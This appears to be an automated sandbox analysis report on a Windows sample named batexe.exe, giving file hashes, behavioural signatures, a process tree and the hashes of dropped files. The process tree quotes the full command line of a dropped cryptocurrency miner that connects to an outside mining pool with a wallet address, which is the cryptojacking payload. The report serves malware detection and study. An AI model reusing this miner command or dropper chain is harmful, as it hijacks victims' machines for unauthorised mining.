Analysis
-
max time kernel
296s -
max time network
306s -
platform
windows10-1703_x64 -
resource
win10-20231215-ja -
resource tags
arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
11-02-2024 13:47
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 3228 b2e.exe 4684 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4684 cpuminer-sse2.exe 4684 cpuminer-sse2.exe 4684 cpuminer-sse2.exe 4684 cpuminer-sse2.exe 4684 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/4528-5-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4528 wrote to memory of 3228 4528 batexe.exe 74 PID 4528 wrote to memory of 3228 4528 batexe.exe 74 PID 4528 wrote to memory of 3228 4528 batexe.exe 74 PID 3228 wrote to memory of 372 3228 b2e.exe 75 PID 3228 wrote to memory of 372 3228 b2e.exe 75 PID 3228 wrote to memory of 372 3228 b2e.exe 75 PID 372 wrote to memory of 4684 372 cmd.exe 78 PID 372 wrote to memory of 4684 372 cmd.exe 78
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Users\Admin\AppData\Local\Temp\1306.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\1306.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1306.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\18A4.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4684
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD53aed5375e1384e4135e0b24868795469
SHA137c76f9fe5f71a3dece07b2a5538b1659767b735
SHA256e832411366b515e1616c8ae050fd98ba7634d5cda6f64e3a9ff498d55d442f45
SHA512e57d59b37013bfb037d131a5ed03995d7fe12f1ec700abb194fca581100640c1d924a81bfb9641991ae68c9259024001e6ddae93fb76583cf1f6d6aca7cd894c
-
Filesize
1.9MB
MD526ae4d6bfb60c4ae7ed51cb1f1252d79
SHA175d13f97c1ddbfca7f0e85a9134f88ab738d5ffb
SHA256f38d66a06f9f99579c5753500121e9f35588aa5ee5006a0482741475379c5abf
SHA512ea84147cedcea1d53130071e56346280ec4ecb90a5c6826d28e7ec2c3ade3566fae4be300da6dc8f67a2e4733ecdcc74c2cab010caa6d357f9686d5f0882aa45
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
143KB
MD5723123f97fb765c4a47c6f196f76062b
SHA18bf2f5afb7019e8c3a40866aaeab3ee13665b9f1
SHA256eed854bf942edc77b1c3e14008c3edf01e9bf499413e4a62967a47b1682f3d0e
SHA51235211337bceb6a3d61b42bd0350abebc2b121d170a73a7433e9285d8cf05e7b8f1d7a7084d34a5f8250985a8ef9a4de7c109c38568065be5b410a15e18dddb01
-
Filesize
109KB
MD5e12cf955ca3fc65cde39eb74d3838e7f
SHA1daeb58aa52d124798850f45be92dbe94608cd125
SHA2566865ccf7a90ee693f2f3fb6ca8184368cb9f8c4db363eb7bc9233f9a52f9bb41
SHA51205ca6ba83ff5c9c24afa4aa05568789a7280d07484fc89fa47ef8c721de55a7da4e8d9d3c8efc4c2f46d3ee8f8209d49810c12745e57213962745c6810cb53a7
-
Filesize
100KB
MD595bf04d690873f7eb229d64eba0de8c5
SHA11e0fd4039a79ff2efea4845fb4a4033b8ce7e370
SHA256fe45599a72789fc2afa8e64355a7b4142f9883ed1e29b7035d4c05c03352bbd7
SHA5124a145378b074882a5daa8699c75f8442273c82f711630f3591f8ff20ed276d9e7264590373843480347141056b5bda794b16d7859b7894e5390c0f76f69fc7d4
-
Filesize
136KB
MD5e2bf4d22156f8450e12995607a187db2
SHA1d3794204e3e987eb2111bf57866df865c632a5de
SHA25627955b6cce024cc338e75452b06b3615c64c3d5186ed46d360f75d3709279ab0
SHA512f5cc8f94598afc5999d0460ead2e1eeecff789e0b7bac0c2655e0d3dbb7ebc6865cc21103d19d4eb1723e61d01bb926f266569d392c5f1ad5359f7d48edf9a33
-
Filesize
78KB
MD5805192bf315cfcf3ed4c141a25dc90dd
SHA1b35c61598c6c8e5ac7ad4e9893e12d651358a718
SHA256b682da0b679dda6bc5244b29d3397079fa6a1739b805168a2178329c47bdf682
SHA512c81d98d3b917ad53b7081daf148e0049e11f2440c72258637b45b79bb65dbd29b74193f5a0a9385720c4752f64a92cad07d1651b4a45e9b440061f1893d5eba9
-
Filesize
84KB
MD575fad25bad93dd3392d39541e05322cf
SHA146c9b804d713934c3069f52b207b774224de42aa
SHA256e50a5deb6de825b3c149ed88509f9f85d3198a33517cdf4a12ebdde7d8f370ec
SHA512f17fb491dc1e042510cae581ba5b971713f42168a8e5cf3f288571cb3e5c39c13d16318a0dcfde26091ad984010955e6a6d9d58cbe1623db568d804577f89bdc
-
Filesize
101KB
MD583fe5545ec0b61f11a924102000c16b2
SHA1c355950a49d9b9f5aacced58ef173714315c08e8
SHA256e517d38e207fefe3248f59944b99057d45cc5c9e2dfd41a2cadae5df304a63ba
SHA512704d148dfa7795834a5f25ed207d33f3f2ede715e66fe32707ac7a3dd13d4dc00848f223fc46f7f4f19e93a6be67655d136b591b2fd0806c5e81918dcdd9de38
-
Filesize
47KB
MD5aeb3976ade4021e8a23643e8808e2e9a
SHA1f0281a85c18a912184c9c4655b76482233e23b1a
SHA256b5488bd5c01a216175f23a7435ef9f80e2cd08ef2b02f62f08080935caa7e711
SHA5121b44fcc56532207e71135f28d801f554a24cdb9ed5a23e13a6aad9feb3adb98106a5f9549d288d16d05eb46967f94d92e39d50224cdb310828a96f8d76a542aa
-
Filesize
117KB
MD5281eb3b84f9298e2c4e97fc79b4e8674
SHA1f3d953ddb16538690451c189ec7891d48c20cee6
SHA25600d4409912f5b509bea0bc23c60dce57e793a8ca90710e907b5a9a7092495b2b
SHA512533d31f181353d9185de4c6a754ce159918b8b9d927e8ddb3437ba626d70a6f13fe3fc8691cb2a07426f71afa5ee5325201c0474b590cc83008b8d037288812f
-
Filesize
39KB
MD541623eb0c2fc39acd154c82351738b1b
SHA1931593734417bd86db236696cca4c97a550222c5
SHA256715676bf1f059128bbd0e557fe963522556158520bb9a0b27cbe296958b0f4ea
SHA51273e058c25b8e342427c9d44eba435a34cdf0fdb1eb08b49048061d5be6acbd256b50e47f30ac37b484ac25991e2ae6e6d9751752bea49d01f163403beead339b
-
Filesize
105KB
MD5665d945c7bb51fa91ad6ec6a40db07e0
SHA12d4b0e677eca1089265bb25c0e94870accee9341
SHA25645a6238f6516f5805a5b53a9acf6344e626b5d3379c02bed0d1418886882e92a
SHA512a7610cdd27eca8dec28c3d9b34b3c98be5f944e3620d7736bf135d20f06de46369a1b8ce476a2ad8cc2d95c73bce8561282bc5cae3f3ef2ba1cab4231926cc33